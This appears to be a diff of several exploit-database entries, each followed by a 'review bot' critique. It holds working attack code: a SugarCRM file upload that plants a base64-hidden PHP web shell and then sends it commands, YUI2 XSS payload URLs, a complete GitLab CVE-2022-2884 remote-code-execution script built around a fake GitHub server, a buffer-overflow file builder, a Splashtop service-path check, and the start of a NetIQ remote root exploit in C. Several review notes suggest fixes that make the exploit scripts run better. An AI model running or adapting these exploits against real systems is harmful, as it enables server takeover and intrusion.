png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"
upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml
params = {"module": "EmailTemplates", "action": "AttachFiles"}
requests.post(url, cookies=session, data=params, files=upload, verify=False)
url = sys.argv[1] + "/cache/images/sweet.phar"
while True:
cmd = raw_input("# ")
res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)
res = re.search("#####(.*)#####", res.text, re.DOTALL)
if res:
print res.group(1)
else:
sys.exit("\n[+] Failure!\n")
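Review bot: the script is Python 2 only (`print "..."` statements and `raw_input`) while the shebang is `#!/usr/bin/env python`, which resolves to Python 3 on most current systems; the header should state the interpreter requirement. The entry also records no CVE and no fixed version for "all commercial versions up to 12.2.0", and gives no description of the server-side condition being abused (an `EmailTemplates`/`AttachFiles` upload accepted after a failed `Users`/`Authenticate` request, landing under `cache/images/`), which defenders need in order to verify a fix or write a detection for the request sequence.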


@ -0,0 +1,34 @@
# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 2/1/2023
# Exploit Author: Rian Saaty
# Vendor Homepage: https://yui.github.io/yui2/
# Software Link: https://yui.github.io/yui2/
# Version: 2.8.2
# Tested on: MacOS, WindowsOS, LinuxOS
# CVE : CVE-2022-48197
The YUI2 has a lot of reflected XSS vulnerabilities in pretty much
most files. A sample of the vulnerable files along with the exploit
can be found here:
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
Twitter: @Ryan_412_
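Review bot: the URLs all point at `sandbox/treeview/*.php` under a `bower_components/yui2` path on localhost, i.e. the library's own test pages, so the exposure depends on those sandbox files being deployed under a web root; the entry should say which application or deployment was tested ("MacOS, WindowsOS, LinuxOS" names operating systems, not the hosting application) and note that removing the sandbox directory from production is the practical mitigation. One URL (`readd.php`) also has a duplicated `/libs/libs/` path segment.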

607
exploits/ruby/webapps/51181.py Executable file

@ -0,0 +1,607 @@
# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-12-25
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install/
# Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1
# Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution)
# CVE: CVE-2022-2884
# Category: WebApps
# Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884
# Credits: yvvdwf (https://hackerone.com/reports/1672388)
# This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.
# A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3,
# 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution
# via the Import from GitHub API endpoint.
# https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/
# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.
import argparse
import logging
import validators
import random
import string
import requests
import time
import base64
import sys
from flask import Flask, current_app, request
from multiprocessing import Process
VERSION = "v1.0 (2022-12-25)"
DEFAULT_LOGGING_LEVEL = logging.INFO
app = Flask(__name__)
def parse_arguments():
parser = argparse.ArgumentParser(
description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}"
)
parser.add_argument("-u", "--url",
required=True,
help="URL of the victim GitLab")
parser.add_argument("-pt", "--private-token",
required=True,
help="private token of GitLab")
parser.add_argument("-tn", "--target-namespace",
required=False,
default="root",
help="target namespace of GitLab (default is 'root')")
parser.add_argument("-a", "--address",
required=True,
help="IP address of the attacker machine")
parser.add_argument("-p", "--port",
required=False,
type=int,
default=1337,
help="TCP port of the attacker machine (default is 1337)")
parser.add_argument("-s", "--https",
action="store_true",
required=False,
default=False,
help="set if the attacker machine is exposed via HTTPS")
parser.add_argument("-c", "--command",
required=True,
help="the command to execute")
parser.add_argument("-d", "--delay",
type=float,
required=False,
help="seconds of delay to wait for the exploit to complete")
parser.add_argument("-v", "--verbose",
action="store_true",
required=False,
default=False,
help="verbose mode")
return parser.parse_args()
def validate_input(args):
try:
validators.url(args.url)
except validators.ValidationFailure:
raise ValueError("Invalid target URL!")
if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"):
raise ValueError("Invalid GitLab private token!")
if len(args.target_namespace.strip()) < 1:
raise ValueError("Invalid GitLab target namespace!")
try:
validators.ipv4(args.address)
except validators.ValidationFailure:
raise ValueError("Invalid attacker IP address!")
if args.port < 1 or args.port > 65535:
raise ValueError("Invalid attacker TCP port!")
if len(args.command.strip()) < 1:
raise ValueError("Invalid command!")
if args.delay is not None and args.delay <= 0.0:
raise ValueError("Invalid delay!")
def generate_random_string(length):
letters = string.ascii_lowercase + string.ascii_uppercase + string.digits
return ''.join(random.choice(letters) for i in range(length))
def generate_random_lowercase_string(length):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def generate_random_number(length):
letters = string.digits
result = "0"
while result.startswith("0"):
result = ''.join(random.choice(letters) for i in range(length))
return result
def base64encode(to_encode):
return base64.b64encode(to_encode.encode("ascii")).decode("ascii")
def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id):
logging.info("Sending request to target GitLab.")
protocol = "http"
if is_https:
protocol += "s"
headers = {
"Content-Type": "application/json",
"PRIVATE-TOKEN": private_token,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
}
fake_personal_access_token = "ghp_" + generate_random_string(36)
new_name = generate_random_lowercase_string(8)
logging.debug("Random generated parameters of the request:")
logging.debug(f" fake_repo_id = {fake_repo_id}")
logging.debug(f"fake_personal_access_token = {fake_personal_access_token}")
logging.debug(f" new_name = {new_name}")
payload = {
"personal_access_token": fake_personal_access_token,
"repo_id": fake_repo_id,
"target_namespace": target_namespace,
"new_name": new_name,
"github_hostname": f"{protocol}://{address}:{port}"
}
target_endpoint = f"{url}"
if not target_endpoint.endswith("/"):
target_endpoint = f"{target_endpoint}/"
target_endpoint = f"{target_endpoint}api/v4/import/github"
try:
r = requests.post(target_endpoint, headers=headers, json=payload)
logging.debug("Response:")
logging.debug(f"status_code = {r.status_code}")
logging.debug(f" text = {r.text}")
logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).")
if r.status_code != 201:
logging.fatal("Wrong response received from the target GitLab.")
logging.debug(f" text = {r.text}")
raise Exception("Wrong response received from the target GitLab.")
except:
logging.fatal("Error in contacting the target GitLab.")
raise Exception("Error in contacting the target GitLab.")
def is_server_alive(address, port, is_https):
protocol = "http"
if is_https:
protocol += "s"
try:
r = requests.get(f"{protocol}://{address}:{port}/")
if r.status_code == 200 and "The server is running." in r.text:
return True
else:
return False
except:
return False
def start_fake_github_server(address, port, is_https, command, fake_repo_id):
app.config["address"] = address
app.config["port"] = port
protocol = "http"
if is_https:
protocol += "s"
app.config["attacker_server"] = f"{protocol}://{address}:{port}"
app.config["command"] = command
app.config["fake_user"] = generate_random_lowercase_string(8)
app.config["fake_user_id"] = generate_random_number(8)
app.config["fake_repo"] = generate_random_lowercase_string(8)
app.config["fake_repo_id"] = fake_repo_id
app.config["fake_issue_id"] = generate_random_number(9)
app.run("0.0.0.0", port)
def encode_command(command):
encoded_command = ""
for c in command:
encoded_command += ("<< " + str(ord(c)) + ".chr ")
encoded_command += "<<"
logging.debug(f"encoded_command = {encoded_command}")
return encoded_command
def generate_rce_payload(command):
logging.debug("Crafting RCE payload:")
logging.debug(f" command = {command}")
encoded_command = encode_command(command) # Useful in order to prevent escaping hell...
rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\""
logging.debug(f" rce_payload = {rce_payload}")
return rce_payload
def generate_user_response(attacker_server, fake_user, fake_user_id):
response = {
"avatar_url": f"{attacker_server}/avatars/{fake_user_id}",
"events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}",
"followers_url": f"{attacker_server}/users/{fake_user}/followers",
"following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}",
"gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}",
"gravatar_id": "",
"html_url": f"{attacker_server}/{fake_user}",
"id": int(fake_user_id),
"login": f"{fake_user}",
"node_id": base64encode(f"04:User{fake_user_id}"),
"organizations_url": f"{attacker_server}/users/{fake_user}/orgs",
"received_events_url": f"{attacker_server}/users/{fake_user}/received_events",
"repos_url": f"{attacker_server}/users/{fake_user}/repos",
"site_admin": False,
"starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}",
"subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions",
"type": "User",
"url": f"{attacker_server}/users/{fake_user}"
}
return response
def generate_user_full_response(attacker_server, fake_user, fake_user_id):
partial = generate_user_response(attacker_server, fake_user, fake_user_id)
others = {
"bio": None,
"blog": "",
"company": None,
"created_at": "2020-08-21T14:35:46Z",
"email": None,
"followers": 2,
"following": 0,
"hireable": None,
"location": None,
"name": None,
"public_gists": 0,
"public_repos": 0,
"twitter_username": None,
"updated_at": "2022-08-08T12:11:40Z",
}
response = {**partial, **others}
return response
def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id):
response = {
"allow_auto_merge": False,
"allow_forking": True,
"allow_merge_commit": True,
"allow_rebase_merge": True,
"allow_squash_merge": True,
"allow_update_branch": False,
"archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}",
"archived": False,
"assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}",
"blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}",
"branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}",
"clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git",
"collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}",
"comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}",
"commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}",
"compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}",
"contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}",
"contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors",
"created_at": "2021-04-09T13:55:55Z",
"default_branch": "main",
"delete_branch_on_merge": False,
"deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments",
"description": None,
"disabled": False,
"downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads",
"events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events",
"fork": False,
"forks": 1,
"forks_count": 1,
"forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks",
"full_name": f"{fake_user}/{fake_repo}",
"git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}",
"git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}",
"git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}",
"git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git",
"has_downloads": True,
"has_issues": True,
"has_pages": False,
"has_projects": True,
"has_wiki": True,
"homepage": None,
"hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks",
"html_url": f"{attacker_server}/{fake_user}/{fake_repo}",
"id": int(repo_id),
"is_template": False,
"issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}",
"issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}",
"issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}",
"keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}",
"labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}",
"language": "Python",
"languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages",
"license": None,
"merge_commit_message": "Message",
"merge_commit_title": "Title",
"merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges",
"milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}",
"mirror_url": None,
"name": f"{fake_repo}",
"network_count": 1,
"node_id": base64encode(f"010:Repository{repo_id}"),
"notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}",
"open_issues": 4,
"open_issues_count": 4,
"owner": generate_user_response(attacker_server, fake_user, fake_user_id),
"permissions": {
"admin": True,
"maintain": True,
"pull": True,
"push": True,
"triage": True
},
"private": True,
"pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}",
"pushed_at": "2022-08-14T15:36:21Z",
"releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}",
"size": 3802,
"squash_merge_commit_message": "Message",
"squash_merge_commit_title": "Title",
"ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git",
"stargazers_count": 0,
"stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers",
"statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}",
"subscribers_count": 1,
"subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers",
"subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription",
"svn_url": f"{attacker_server}/{fake_user}/{fake_repo}",
"tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags",
"teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams",
"temp_clone_token": generate_random_string(32),
"topics": [],
"trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}",
"updated_at": "2022-06-10T15:12:53Z",
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}",
"use_squash_pr_title_as_default": False,
"visibility": "private",
"watchers": 0,
"watchers_count": 0,
"web_commit_signoff_required": False
}
return response
def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command):
rce_payload = generate_rce_payload(command)
response = [
{
"active_lock_reason": None,
"assignee": None,
"assignees": [],
"author_association": "OWNER",
"body": "hn-issue description",
"closed_at": None,
"comments": 1,
"comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments",
"created_at": "2021-07-23T13:16:55Z",
"events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events",
"html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3",
"id": int(fake_issue_id),
"labels": [],
"labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}",
"locked": False,
"milestone": None,
"node_id": base64encode(f"05:Issue{fake_issue_id}"),
"_number": 1,
"number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }},
"performed_via_github_app": None,
"reactions": {
"+1": 0,
"-1": 0,
"confused": 0,
"eyes": 0,
"heart": 0,
"hooray": 0,
"laugh": 0,
"rocket": 0,
"total_count": 0,
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions"
},
"repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test",
"state": "open",
"state_reason": None,
"timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline",
"title": f"{fake_repo}",
"updated_at": "2022-08-14T15:37:08Z",
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3",
"user": generate_user_response(attacker_server, fake_user, fake_user_id)
}
]
return response
@app.before_request
def received_request():
logging.debug(f"Received request:")
logging.debug(f" url = {request.url}")
logging.debug(f"headers = {request.headers}")
@app.after_request
def add_headers(response):
response.headers["content-type"] = "application/json; charset=utf-8"
response.headers["x-ratelimit-limit"] = "5000"
response.headers["x-ratelimit-remaining"] = "4991"
response.headers["x-ratelimit-reset"] = "1660136749"
response.headers["x-ratelimit-used"] = "9"
response.headers["x-ratelimit-resource"] = "core"
return response
@app.route("/")
def index():
return "The server is running."
@app.route("/api/v3/rate_limit")
def api_rate_limit():
response = {
"resources": {
"core": {
"limit": 5000,
"used": 9,
"remaining": 4991,
"reset": 1660136749
},
"search": {
"limit": 30,
"used": 0,
"remaining": 30,
"reset": 1660133589
},
"graphql": {
"limit": 5000,
"used": 0,
"remaining": 5000,
"reset": 1660137129
},
"integration_manifest": {
"limit": 5000,
"used": 0,
"remaining": 5000,
"reset": 1660137129
},
"source_import": {
"limit": 100,
"used": 0,
"remaining": 100,
"reset": 1660133589
},
"code_scanning_upload": {
"limit": 1000,
"used": 0,
"remaining": 1000,
"reset": 1660137129
},
"actions_runner_registration": {
"limit": 10000,
"used": 0,
"remaining": 10000,
"reset": 1660137129
},
"scim": {
"limit": 15000,
"used": 0,
"remaining": 15000,
"reset": 1660137129
},
"dependency_snapshots": {
"limit": 100,
"used": 0,
"remaining": 100,
"reset": 1660133589
}
},
"rate": {
"limit": 5000,
"used": 9,
"remaining": 4991,
"reset": 1660136749
}
}
return response
@app.route("/api/v3/repositories/<repo_id>")
@app.route("/repositories/<repo_id>")
def api_repositories_repo_id(repo_id: int):
address = current_app.config["address"]
port = current_app.config["port"]
attacker_server = current_app.config["attacker_server"]
fake_user = current_app.config["fake_user"]
fake_user_id = current_app.config["fake_user_id"]
fake_repo = current_app.config["fake_repo"]
response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id)
return response
@app.route("/api/v3/repos/<user>/<repo>")
def api_repositories_repo_user_repo(user: string, repo: string):
address = current_app.config["address"]
port = current_app.config["port"]
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
fake_repo_id = current_app.config["fake_repo_id"]
response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id)
return response
@app.route("/api/v3/repos/<user>/<repo>/issues")
def api_repositories_repo_user_repo_issues(user: string, repo: string):
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
fake_issue_id = current_app.config["fake_issue_id"]
command = current_app.config["command"]
response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command)
return response
@app.route("/api/v3/users/<user>")
def api_users_user(user: string):
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
response = generate_user_full_response(attacker_server, user, fake_user_id)
return response
@app.route("/<user>/<repo>.git/HEAD")
@app.route("/<user>/<repo>.git/info/refs")
@app.route("/<user>/<repo>.wiki.git/HEAD")
@app.route("/<user>/<repo>.wiki.git/info/refs")
def empty_response(user: string, repo: string):
logging.debug("Empty string response.")
return ""
# All the others/non-existing routes.
@app.route('/<path:path>')
def catch_all(path):
logging.debug("Empty JSON array response.")
return []
def main():
args = parse_arguments()
logging_level = DEFAULT_LOGGING_LEVEL
if args.verbose:
logging_level = logging.DEBUG
logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")
validate_input(args)
url = args.url.strip()
private_token = args.private_token.strip()
target_namespace = args.target_namespace.strip()
address = args.address.strip()
port = args.port
is_https = args.https
command = args.command.strip()
delay = args.delay
logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}")
logging.debug("Parameters:")
logging.debug(f" url = {url}")
logging.debug(f" private_token = {private_token}")
logging.debug(f"target_namespace = {target_namespace}")
logging.debug(f" address = {address}")
logging.debug(f" port = {port}")
logging.debug(f" is_https = {is_https}")
logging.debug(f" command = {command}")
logging.debug(f" delay = {delay}")
fake_repo_id = generate_random_number(9)
fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id))
fake_github_server.start()
logging.info("Waiting for the fake GitHub server to start.")
while not is_server_alive(address, port, is_https):
time.sleep(1)
logging.debug("Waiting for the fake GitHub server to start.")
logging.info("Fake GitHub server is running.")
try:
send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id)
except:
logging.critical("Aborting the script.")
fake_github_server.kill()
sys.exit(1)
if delay is not None:
logging.info(f"Waiting for {delay} seconds to let attack finish.")
time.sleep(delay)
else:
logging.info("Press Enter when the attack is finished.")
input()
logging.debug("Stopping the fake GitHub server.")
fake_github_server.kill()
logging.info("Closing the script.")
if __name__ == "__main__":
main()
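Review bot: `validate_input()` never rejects a malformed `--url` or `--address`, because `validators.url()` and `validators.ipv4()` return a `ValidationFailure` object on failure instead of raising one, so both `except validators.ValidationFailure:` branches are dead code; test the return value instead, e.g. `if not validators.url(args.url): raise ValueError("Invalid target URL!")`. Likewise `if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"):` can only be true for an empty token, so the prefix check never rejects anything (either `or` was intended or the prefix test should go). Two robustness points: `logging.debug(f"   private_token = {private_token}")` writes the credential to the log in verbose mode and should be masked, and the bare `except:` clauses in `send_request()`, `is_server_alive()` and `main()` also catch `KeyboardInterrupt`, so an aborted run can leave the Flask child process listening on `0.0.0.0`; catch `Exception` and put `fake_github_server.kill()` in a `finally:`.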


@ -0,0 +1,60 @@
## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Date: 01.05.2023
## Vendor: https://aimone-video-converter.software.informer.com/,
http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:
## Description:
The AimOne Video Converter V2.04 Build 103 suffers from buffer
overflow and local Denial of Service.
The registration form is not working properly and crashes the video converter.
When the attacker decides to register the product. This can allow him
to easily crack the software and do more bad things it depending on
the case.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
```Python
#!/usr/bin/python
# nu11secur1ty
print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer
Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")
buffer = "\x41" * 7000
try:
f=open("PoC.txt","w")
print("[+] Creating %s bytes exploit payload.." %len(buffer))
f.write(buffer)
f.close()
print("[+] The PoC file was created!")
except:
print("File cannot be created")
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)
## Proof and Exploit:
[href](https://streamable.com/v1hvbf)
## Time spent
`00:35:00`
## Writing an exploit
`00:15:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
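Review bot: the script as committed does not parse: the string literal in `print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer` continues on the next line (`Overflow exploit builder...\n")`), which is a SyntaxError in Python; rejoin it on one line or split it into two adjacent quoted strings. The `try:` block would also be clearer as `with open("PoC.txt", "w") as f:` (no explicit `close()`), and the bare `except:` with the fixed message `print("File cannot be created")` hides the actual error; use `except OSError as e:` and print `e`. On the writeup itself, `## Reference:` is empty, and `## STATUS: HIGH Vulnerability - CRITICAL` is not supported by what is demonstrated: the PoC shows a crash of the registration form (a local DoS), while the claim that an attacker can "easily crack the software" is asserted without evidence.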


@ -0,0 +1,28 @@
# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path
# Date: 12/20/2022
# Exploit Author: A.I. hernandez
# Version: 8.71.12001.0
# Vendor Homepage: https://www.splashtop.com
# Version: current version
# Tested on: Windows 10 21H2
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Splashtop Software Updater Service SSUService C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
Auto
C:\>sc qc SSUService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SSUService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Splashtop Software Updater Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
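Review bot: the writeup shows the unquoted path `C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe` running as `LocalSystem`, but never establishes that a standard user can create files in `C:\` or in `C:\Program Files (x86)\Splashtop`; without a writable path component this is a hygiene finding, not a privilege escalation, so the directory ACLs should be listed before the severity is claimed. The header also carries two contradictory `# Version:` lines (`8.71.12001.0` and `current version`); keep one. The `sc qc` output is from a Spanish locale (`NOMBRE_RUTA_BINARIO`, `NOMBRE_INICIO_SERVICIO`); a short mapping to the English field names (BINARY_PATH_NAME, SERVICE_START_NAME) would help readers. For remediation the ImagePath of `SSUService` needs to be wrapped in quotes in the service registration.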


@ -0,0 +1,801 @@
/*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
* endpoint-pown-uni.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
* by mu-b - Jun 2007
*
* $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
*
* - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15541 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15368 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1 (win32)
* NetIQ Performance Endpoint 4.2 (freebsd-x86)
* NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
* (Revised: May 23, 2006)
*
*
* "No executable code (like Java or Visual Basic) is sent. There is no way
* to do something like 'run this command.' 100,000s of endpoints have been
* installed worldwide without incident."
*
* "Endpoints do rigorous internal validation. For example, endpoints are not
* susceptible to 'buffer overrun' attacks used by hackers."
* - https://tinyurl.com/lgmblyj
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define IPV4_BUFLEN 16 /* "255.255.255.255\0" */
#define PORT_SHELL 10000
#define ENDPT_TCP_PORT 10115
#define ENDPT_PKTMAX 0x1388
static char ppkt_buf1[] =
"\x06" /* ENDPT_COMMAND_SETUP_E1 */
"\x07\x14\x43\x1A" /* verify_get_id (1) */
"\x00\x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
